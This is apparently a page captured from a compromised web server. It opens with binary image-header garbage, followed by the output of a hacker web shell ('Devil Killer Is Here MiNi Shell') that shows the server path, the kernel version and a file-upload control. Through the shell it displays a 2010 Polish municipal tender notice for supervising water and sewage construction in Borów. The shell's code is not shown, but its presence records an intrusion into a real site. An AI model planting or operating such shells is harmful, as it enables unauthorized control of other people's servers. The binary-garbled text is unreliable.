JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100305/61672-N-2010.html

<p class="kh_header"><b>Borów: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego nad realizacją inwestycji pn. Poprawa stanu gospodarki wodno-ściekowej w Gminie Borów.</b><br>
<b>Numer ogłoszenia: 61672 - 2010; data zamieszczenia: 05.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zakład Gospodarki Komunalnej w Borowie , ul. Konstytucji 3 Maja 22, 57-160 Borów, woj. dolnośląskie, tel. 71 3927639, 3933450, faks 71 3933035.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.borow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego nad realizacją inwestycji pn. Poprawa stanu gospodarki wodno-ściekowej w Gminie Borów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są  usługi w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego dla zadania pn. Poprawa stanu gospodarki wodno-ściekowej w Gminie Borów. Przez pełnienie ww czynności   należy rozumieć świadczenie usługi nadzoru nad robotami budowlanymi przez Wykonawcę dysponującego zespołem wykwalifikowanych osób, posiadających stosowne uprawnienia, umiejętności i doświadczenie zapewniające nadzorowanie inwestycji od jej początkowego stadium tj.wyboru Wykonawcy robót budowlanych, poprzez kompleksowe prowadzenie nadzoru robót i monitoring robót.
W ramach zadania przewidziano nadzór inwestorski nad wykonaniem robót budowlanych, sanitarnych, elektrycznych i drogowych oraz nadzór nad dokonaniem czynności formalnych wynikających z warunków technicznych, uzgodnień i obowiązujących decyzji, a także nadzór nad wykonaniem dokumentacji powykonawczej wszystkich branż. 
W ramach pełnienia funkcji inspektora nadzoru do zadań Wykonawcy należy w szczególności:
1.	reprezentowanie inwestora oraz jego interesów wobec wszystkich uczestników procesu inwestycyjnego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem, pozwoleniem na budowę, przepisami prawa i obowiązującymi normami oraz zasadami wiedzy technicznej, 
2.	nadzór inwestorski przy realizacji inwestycji nad wszystkimi branżami, zgodnie z przepisami ustawy prawo budowlane i innymi obowiązującymi w zakresie przepisami prawa,
3.	współpraca z kierownikami budowy oraz z autorem projektu,
4.	nadzorowanie koordynacji prac wykonywanych przez Wykonawców Inwestycji,
5.	wnioskowanie do zatwierdzenia przez Zamawiającego, uzgodnionych z autorem projektu wszelkich zmian wnoszonych przez uczestników procesu inwestycyjnego,
6.	w razie potrzeby wzywanie projektantów na budowę, kierowanie do nich pytań i zastrzeżeń do projektu,
7.	sprawdzenie jakości wykonanych robót, wbudowanych wyrobów, a w szczególności zapobieganie stosowania wyrobów wadliwych niedopuszczonych do obrotu i stosowania w budownictwie, 
8.	sprawdzanie i odbiór robót zanikających, uczestniczenie w próbach i odbiorach technicznych oraz przygotowanie i udział w odbiorze robót i przekazaniu do użytkowania, 
9.	potwierdzenie faktycznie wykonanych prac oraz kontrola usunięcia wad,
10.	wydawanie kierownikowi budowy poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących usunięcia nieprawidłowości i zagrożeń, wpisów o próbach i badaniach, wpisach o dowodach dopuszczenia do obrotu i stosowania w budownictwie, 
11.	żądanie od kierownika budowy lub robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych prac, a także wstrzymania dalszych robót w przypadku, gdyby ich kontynuacja wywoływała zagrożenia bądź powodowała niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę, 
12.	udział w spotkaniach i naradach dot. realizacji robót, 
13.	kontrola ilości i terminowości wykonania robót,  
14.	kontrola dokonania czynności formalnych wynikających z warunków technicznych, uzgodnień i obowiązujących decyzji, 
15.	kontrola wykonania dokumentacji powykonawczej wszystkich branż, 
16.	uczestnictwo w odbiorach robót budowlanych,
17.	skompletowanie i sprawdzenie dokumentacji odbiorowej oraz dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie. 

Ustala się co najmniej 1 wizytę w tygodniu Wykonawcy na budowie w okresie realizacji  inwestycji. Ponadto, na wezwanie Zamawiającego lub kierownika budowy w sprawach nie cierpiących zwłoki, Wykonawca zobowiązany będzie do stawienia się niezwłocznie na terenie budowy i podjęcia czynności objętych umową. Liczba pobytów inspektora nadzoru na budowie musi zapewnić prawidłowy nadzór nad przebiegiem robót i wynikać będzie z bieżących potrzeb.

Wykonawca zobowiązuje się do wykonania czynności wymienionych powyżej z należytą starannością w oparciu o aktualne unormowania prawne wynikające z przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane tekst jedn. Dz. U. Nr 156 z 2006 r. poz. 1118 ze zmianami, zgodnie z obowiązującymi standardami, zasadami sztuki budowlanej oraz etyką zawodową. 

Miejsce realizacji inwestycji: 
-miejscowość Jaksin w Gminie Borów,  w zakresie budowy zbiornika wody czystej, 
-miejscowość Kojęcin w Gminie Borów, w zakresie budowy kanalizacji sanitarnej,
-miejscowość Borek Strzeliński w Gminie Borów, w zakresie budowy kanalizacji sanitarnej i rozbudowy sieci wodociągowej,
-miejscowość Boreczek w Gminie Borów, w zakresie budowy kanalizacji sanitarnej.

Inwestycja została podzielona na następujące etapy i zadania:

ETAP I  (przewidziany termin realizacji początek  kwiecień 2010r. -koniec  wrzesień 2010r.)

Zadanie 1
Budowa zbiornika czystej wody w Jaksinie-rozbudowa SUW.
Zakres rzeczowy nadzorowanej inwestycji obejmuje wykonanie zbiornika kołowego o konstrukcji żelbetowej monolitycznej, ocieplonego na całej wysokości wełna mineralną. Parametry zbiornika:
powierzchnia zabudowy obiektu - 29,03 m2
pojemność zbiornika - 100,00 m3
kubatura obiektu -137,00 m3
wysokość obiektu - 3,27 m
średnica - fi 6,08 m.
Ponadto projekt przewiduje zagospodarowanie terenu wraz z elementami infrastruktury technicznej tj. kanalizacją, instalacją wodociągową łączącą budowany zbiornik ze zbiornikiem już istniejącym i stacją uzdatniania wody oraz miejsca parkingowego na jeden samochód o powierzchni 32 m2.

Zadanie 2
Budowa kanalizacji sanitarnej w Kojęcinie.
Nadzorowana inwestycja obejmuje budowę kanalizacji sanitarnej grawitacyjno-ciśnieniowej w następującym zakresie:
sieć grawitacyjna PCV fi 200 mm-614,74 m
sieć grawitacyjna PCV fi 160 mm-160,4 m
rurociąg tłoczny PEHD fi 110 mm-998,99 m
przepompowanie ścieków - 1 szt.

Zadanie 3
Budowa kanalizacji sanitarnej w Borku Strzelińskim.
Nadzorowana inwestycja obejmuje budowę kanalizacji sanitarnej grawitacyjno-ciśnieniowej w następującym zakresie:
sieć grawitacyjna PCV fi 200 mm-754,80 m
sieć grawitacyjna PCV fi 160 mm-112,94 m
rurociąg tłoczny PEHD fi 110 mm-52,61 m
przepompowanie ścieków - 1 szt.

Zadanie 4
Rozbudowa sieci wodociągowej w Borku Strzelińskim.
Nadzorowana inwestycja obejmuje rozbudowę sieci wodociągowej w Borku Strzelińskim w następującym zakresie:
wodociąg PCV fi 90 mm
o długości 765,2 m 
6 szt. hydrantów nadziemnych DN 80


ETAP II (przewidziany termin realizacji początek kwiecień 2011r.- koniec sierpień 2011r.)

Budowa kanalizacji sanitarnej w Boreczku.
Nadzorowana inwestycja obejmuje budowę kanalizacji sanitarnej grawitacyjno-ciśnieniowej w następującym zakresie:
sieć grawitacyjna PCV fi 200 mm-2 115,54 m
sieć grawitacyjna PCV fi 160 mm-178,91 m
rurociąg tłoczny PEHD fi 90 mm-556,17 m
rurociąg tłoczny PEHD fi 180 mm-4 133,68 m
przepompowanie ścieków - 2 szt.

Szczegółowy opis przedmiotu zamówienia tj. zakres inwestycji stanowi dokumentacja projektowa oraz Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych do wglądu w siedzibie Zamawiającego pok. nr 27.  

Planowany termin zakończenia całości robót objętych przedmiotowym nadzorem jest   
30. 09. 2011rok. 

Sprawowany nadzór inwestorski wymagany będzie w zakresie:
1.	Robót  sanitarnych tj. wodociągowych i kanalizacyjnych.
2.	Robót budowlanych w  specjalności konstrukcyjno-budowlanej.
3.	Robót elektrycznych i elektroenergetycznych.
4.	Robót drogowych.
W przypadku gdy dla każdej z ww  specjalności będzie to inna osoba, głównym inspektorem nadzoru, koordynatorem będzie osoba posiadająca uprawnienia budowlane w zakresie robót sanitarnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - działalność prowadzona na potrzeby zamówienia  wymaga posiadania specjalistycznych uprawnień. Wykonawca musi posiadać wymagane obwiązującymi przepisami uprawnienia w specjalnościach uprawniających go do pełnienia nadzoru nad  inwestycją.
Szczegółowy opis warunku znajduje się poniżej w pkt.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia Zamawiający uzna za spełniony, jeżeli 
Wykonawca wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał usługi w zakresie nadzoru inwestorskiego na co najmniej 3 zadaniach odpowiadających swoim rodzajem pracom stanowiącym przedmiot zamówienia, w tym co najmniej jedna z zakresu budowy  kanalizacji sanitarnej o długości min. 9 km, obejmującej wykonanie sieci wodociągowej, grawitacyjnej i ciśnieniowej wraz z co najmniej 1 przepompownią i przewiertami pod drogami lub torami kolejowymi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku.
Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że w swojej kadrze dysponuje osobą-osobami posiadającymi  odpowiednie doświadczenie, kwalifikacje i uprawnienia do sprawowania nadzoru inwestorskiego w branży sanitarnej (wodociągowej i kanalizacyjnej), budowlanej o specjalności konstrukcyjno-budowlanej, elektrycznej i elektroenergetycznej oraz drogowej. 
Osoba-osoby, które będą uczestniczyć w wykonywaniu zamówienia muszą posiadać kwalifikacje zawodowe oraz doświadczenie niezbędne do wykonania zamówienia, tj.: 
1) do pełnienia funkcji inspektora nadzoru branży sanitarnej - wykształcenie wyższe, 5 letnie doświadczenie w nadzorowaniu robót, uprawnienia bez ograniczeń lub równoważne do wykonywania samodzielnych funkcji w budownictwie o specjalności instalacyjnej w zakresie sieci,instalacji,wodociągowych,kanalizacyjnych,
2) do pełnienia funkcji inspektora nadzoru branży ogólnobudowlanej - wykształcenie wyższe, 3 letnie doświadczenie w nadzorowaniu robót lub pełnieniu funkcji kierownika budowy, uprawnienia bez ograniczeń lub równoważne do wykonywania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej,
3)do pełnienia funkcji inspektora nadzoru branży elektrycznej - wykształcenie wyższe, 3 letnie doświadczenie w nadzorowaniu robót lub pełnieniu funkcji kierownika budowy, uprawnienia bez ograniczeń lub równoważne do wykonywania samodzielnych funkcji w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń;
4) do pełnienia funkcji inspektora nadzoru branży drogowej - wykształcenie wyższe, 3 letnie doświadczenie w nadzorowaniu robót lub pełnieniu funkcji kierownika budowy, uprawnienia bez ograniczeń lub równoważne do wykonywania samodzielnych funkcji w budownictwie o specjalności drogowej.
Osoba-osoby te musza posiadać wszystkie ww uprawnienia do nadzorowania robót budowlanych objętych zamówieniem oraz znajdować się na liście właściwej Izby Samorządu Zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej i finansowej Zamawiający uzna za spełniony, jeżeli 
Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty Wykonawca zobowiazny jest załaczyć nastepujące dokumenty:
-oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ,
-wykaz prac przeznaczonych do wykonania podwykonawcy sporządzony zg. z załącznikiem nr 7 do SIWZ,
-tabela zbiorcza ceny ryczałtowej zg. z załącznikiem nr 8 do SIWZ,
-parafowany wzór umowy stanowiący załącznik nr 11 do SIWZ
-stosowne Pełnomocnictwo w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru 
-w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
- w przypadku opóźnienia zamawiającego w przekazaniu placu budowy ,  
- w przypadku opóźnienia  w rozstrzygnięciu postępowań przetargowych i podpisania umów z Wykonawcami na  wykonanie robót budowlanych objętych planowanym nadzorem,
- w przypadku braków lub wad dokumentacji projektowej lub innych dokumentów, 
- opóźnień zamawiającego w zakresie dokonywania odbioru lub prób końcowych,
- zawieszenie robót przez zamawiającego ,
-wyjątkowo niesprzyjających warunków atmosferycznych (ulewne deszcze, bądź obfite opady śniegu)
